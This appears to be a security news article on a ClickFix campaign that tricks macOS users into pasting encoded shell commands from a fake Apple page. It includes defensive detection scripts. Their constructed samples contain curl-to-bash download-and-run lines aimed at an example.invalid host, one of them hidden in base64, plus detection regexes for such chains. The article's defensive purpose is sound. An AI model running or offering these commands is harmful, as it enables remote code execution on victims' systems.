ZCyberNews

ClickFix Mac Malware Campaign Uses Fake Apple Page to Deliver Payloads

A new ClickFix-style campaign targets macOS users with fake Apple instructions to run malicious commands.



Executive Summary

Security researchers at Jamf have discovered a new social engineering campaign leveraging a ClickFix-style attack to deliver malware to macOS users. The scheme involves a deceptive web page mimicking Apple's branding, prompting victims to execute malicious shell commands under the guise of reclaiming disk space.

Technical Analysis

The malicious website presents itself as an official Apple support resource. It instructs users to open Script Editor and paste a series of encoded commands. Once executed, these commands download and install malware onto the victim's system. According to Jamf's analysis, the script decodes a hidden payload from base64-encoded data embedded within the initial command sequence. Wrapping the real command in base64 keeps the URL and the download logic out of sight of the user, and because the content is fetched by curl from a shell rather than saved by the browser, it never receives the com.apple.quarantine attribute that Gatekeeper and traditional file-scanning antivirus rely on to inspect downloaded files.

Jamf noted that the final payload behavior remains under investigation but exhibits persistence mechanisms typical of post-exploitation frameworks. Specific artifacts such as launch agents or hidden directories are created to maintain access across reboots.
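The launch agent and hidden-directory artifacts mentioned above are the kind of thing a responder hunts for first. The following is an added example, not code from Jamf or from the campaign, that parses launchd property lists and explains why a given agent does or does not look like ClickFix-style persistence. Both sample plists, their labels, paths and the example.invalid URL are constructed for illustration; the indicators it checks (an interpreter as the program, a com.apple.* label outside /System/Library, hidden or temp paths, curl or base64 in the arguments) are general and are not taken from the Jamf report.

```python
import plistlib
import re
from pathlib import Path

# Interpreters and downloaders that a legitimate LaunchAgent rarely names as
# its program; seeing one here is the launchd analogue of a curl-to-bash lure.
INTERPRETER = re.compile(r"(?:^|/)(?:sh|bash|zsh|osascript|curl|base64|python3?)$")
# A hidden path component (/.something) or a temp directory.
HIDDEN_OR_TEMP = re.compile(r"(?:^|/)\.[^/\s]+|^(?:/private)?/(?:tmp|var/tmp)/")
DOWNLOAD_OR_DECODE = re.compile(r"\b(?:curl|wget|base64|openssl)\b")


def triage_launch_agent(plist_bytes, source="<inline>"):
    """Parse one launchd plist and list the reasons it looks (or does not look)
    like ClickFix-style persistence. Returns a dict with label, args, reasons."""
    data = plistlib.loads(plist_bytes)
    if "ProgramArguments" in data:
        args = list(data["ProgramArguments"])
    elif "Program" in data:
        args = [data["Program"]]
    else:
        args = []
    label = data.get("Label", "")
    reasons = []
    if data.get("RunAtLoad"):
        reasons.append("RunAtLoad")
    if data.get("KeepAlive"):
        reasons.append("KeepAlive")
    # Apple's own agents live under /System/Library; a com.apple.* label in a
    # user or third-party LaunchAgents folder is masquerading.
    if label.startswith("com.apple."):
        reasons.append("apple_namespace_label")
    if args and INTERPRETER.search(args[0]):
        reasons.append(f"interpreter_as_program:{args[0]}")
    if any(HIDDEN_OR_TEMP.search(a) for a in args):
        reasons.append("hidden_or_temp_path_in_args")
    if any(DOWNLOAD_OR_DECODE.search(a) for a in args[1:]):
        reasons.append("download_or_decode_in_args")
    # RunAtLoad/KeepAlive alone are normal for agents; anything else tips it over.
    suspicious = any(not r.startswith(("RunAtLoad", "KeepAlive")) for r in reasons)
    return {"source": source, "label": label, "args": args,
            "reasons": reasons, "suspicious": suspicious}


def scan_launch_agents(directory):
    """Triage every .plist in a LaunchAgents folder, e.g. ~/Library/LaunchAgents."""
    results = []
    for path in sorted(Path(directory).expanduser().glob("*.plist")):
        try:
            results.append(triage_launch_agent(path.read_bytes(), str(path)))
        except Exception as exc:  # a plist launchd cannot parse is itself worth a look
            results.append({"source": str(path), "error": repr(exc), "suspicious": True})
    return results


# Constructed samples (hypothetical label, paths and URL; not real indicators).
MALICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.update.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string>
    <string>-c</string>
    <string>mkdir -p $HOME/.config/.sys &amp;&amp; curl -fsSL https://example.invalid/beacon | bash</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>
"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup-agent</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Backup.app/Contents/MacOS/backup-agent</string>
    <string>--sync</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>
"""

if __name__ == "__main__":
    for sample in (MALICIOUS_PLIST, BENIGN_PLIST):
        print(triage_launch_agent(sample))
```

On a live host, `scan_launch_agents("~/Library/LaunchAgents")` and `scan_launch_agents("/Library/LaunchAgents")` cover the two locations a user-level lure can write to without elevated privileges; the reasons list, rather than a bare verdict, is what lets a responder decide quickly which agents to pull for full analysis.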

Tactics, Techniques & Procedures

The primary tactic used in this campaign is social engineering, specifically exploiting user trust in Apple-branded interfaces. Key techniques include:

  • Deceptive Web Content: A convincing replica of Apple’s UI prompts users to perform actions they believe are safe.
  • Living-off-the-Land Binaries (LOLBins): Use of built-in macOS tools like /bin/bash, base64, and curl to decode and execute payloads without raising suspicion.
  • User Execution (T1204): Reliance on manual execution of scripts by end-users rather than exploiting software flaws.
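The detection side of the LOLBin chain above is easier to see in code than in prose. The following is an added example, not code from Jamf or from the campaign, that takes recorded command lines (as an EDR or unified-log collector would supply them), peels base64 layers so the curl stager hidden inside an `echo ... | base64 -d | bash` chain becomes visible, and classifies the result. The sample events, the example.invalid URL and the `~/.cache/.helper` path are constructed here; the first event simply reproduces the shape of the lure the article describes.

```python
import base64
import binascii
import json
import re

# Patterns for the living-off-the-land chain: a base64 blob decoded and piped
# into a shell, curl output piped into a shell, hidden directories, and
# launchd persistence. Shell names cover sh, bash and zsh.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:/bin/)?(?:ba|z)?sh\b")
CURL_TO_SHELL = re.compile(r"\bcurl\b[^|]*\|\s*(?:/bin/)?(?:ba|z)?sh\b")
URL = re.compile(r"https?://[^\s'\"]+")
HIDDEN_PATH = re.compile(r"(?:/|~/|\$HOME/)\.[A-Za-z0-9_]+")


def decode_b64_layers(text, max_depth=3):
    """Decode every base64-looking token in text, then re-scan the decoded
    output so nested encodings are peeled too; returns the decoded layers."""
    layers = []
    frontier = [text]
    for _ in range(max_depth):
        next_frontier = []
        for chunk in frontier:
            for token in B64_TOKEN.findall(chunk):
                try:
                    decoded = base64.b64decode(token, validate=True).decode("utf-8")
                except (binascii.Error, UnicodeDecodeError):
                    continue  # not base64 after all (a hash, a long path, ...)
                if all(c.isprintable() or c.isspace() for c in decoded):
                    layers.append(decoded)
                    next_frontier.append(decoded)
        if not next_frontier:
            break
        frontier = next_frontier
    return layers


def analyze(cmdline):
    """Classify one recorded command line. Returns the findings, the decoded
    layers, and any URLs that only became visible after decoding."""
    layers = decode_b64_layers(cmdline)
    full_text = "\n".join([cmdline] + layers)
    findings = []
    if DECODE_TO_SHELL.search(cmdline):
        findings.append("base64_decoded_into_shell")
    if CURL_TO_SHELL.search(full_text):
        findings.append("curl_piped_into_shell")
    if HIDDEN_PATH.search(full_text):
        findings.append("hidden_directory_reference")
    if "LaunchAgents" in full_text or "launchctl" in full_text:
        findings.append("launchd_persistence")
    return {
        "command": cmdline,
        "findings": findings,
        "decoded_layers": layers,
        "urls": sorted(set(URL.findall(full_text))),
        # Decoding straight into a shell is suspicious on its own; the other
        # indicators are only flagged in combination to limit false positives.
        "suspicious": "base64_decoded_into_shell" in findings or len(findings) >= 2,
    }


# Constructed sample events (not indicators from the Jamf report). The first
# mirrors the lure's shape: a base64 blob that hides a curl-to-bash stager.
INNER_COMMAND = (
    "curl -fsSL https://example.invalid/free-space.sh | /bin/bash "
    "&& mkdir -p ~/.cache/.helper"
)
ENCODED = base64.b64encode(INNER_COMMAND.encode()).decode()
SAMPLE_EVENTS = [
    f"/bin/bash -c 'echo {ENCODED} | base64 -d | /bin/bash'",
    "/usr/bin/open -a 'Script Editor'",
    "ls -la /Users/demo",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(json.dumps(analyze(event), indent=2))
```

The point of decoding before matching is that the URL and the hidden-directory write are not in the command the user pasted; they only appear once the base64 layer is removed, which is exactly what the lure counts on when it asks the victim to paste an opaque blob. Feeding the decoded layers back through the same rules, rather than matching only the outer command, is what lets one rule set catch both the pasted command and the stager it unpacks.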

Threat Actor Context

No specific threat actor has been attributed to this activity. However, the simplicity and broad targeting suggest it may be the work of financially motivated groups or script kiddies using publicly available phishing templates. Attribution remains speculative pending further forensic evidence.

Mitigations & Recommendations

Organizations should implement layered defenses to mitigate risks posed by ClickFix-style attacks:

  • User Awareness Training: Educate staff about the risks of copying and pasting untrusted code into terminal applications or scripting environments, and make clear that Apple does not ask users to free up disk space by pasting commands.
  • Application Allow Lists: Restrict execution of scripting utilities such as Script Editor unless explicitly required.
  • Endpoint Monitoring: Deploy behavioral analytics capable of detecting anomalous use of native OS binaries commonly abused in living-off-the-land scenarios.
  • Browser Protections: Utilize DNS filtering and URL reputation services to block known malicious domains.

Administrators should also keep Gatekeeper enforcement enabled so that files carrying the com.apple.quarantine extended attribute are assessed before they run, while recognising that content fetched by curl from a pasted command never receives that attribute; this lure works precisely because it routes around the download path those controls cover, which is why endpoint monitoring of shell, base64 and curl activity remains necessary.


Tags: #macos #social-engineering #jamf #clickfix
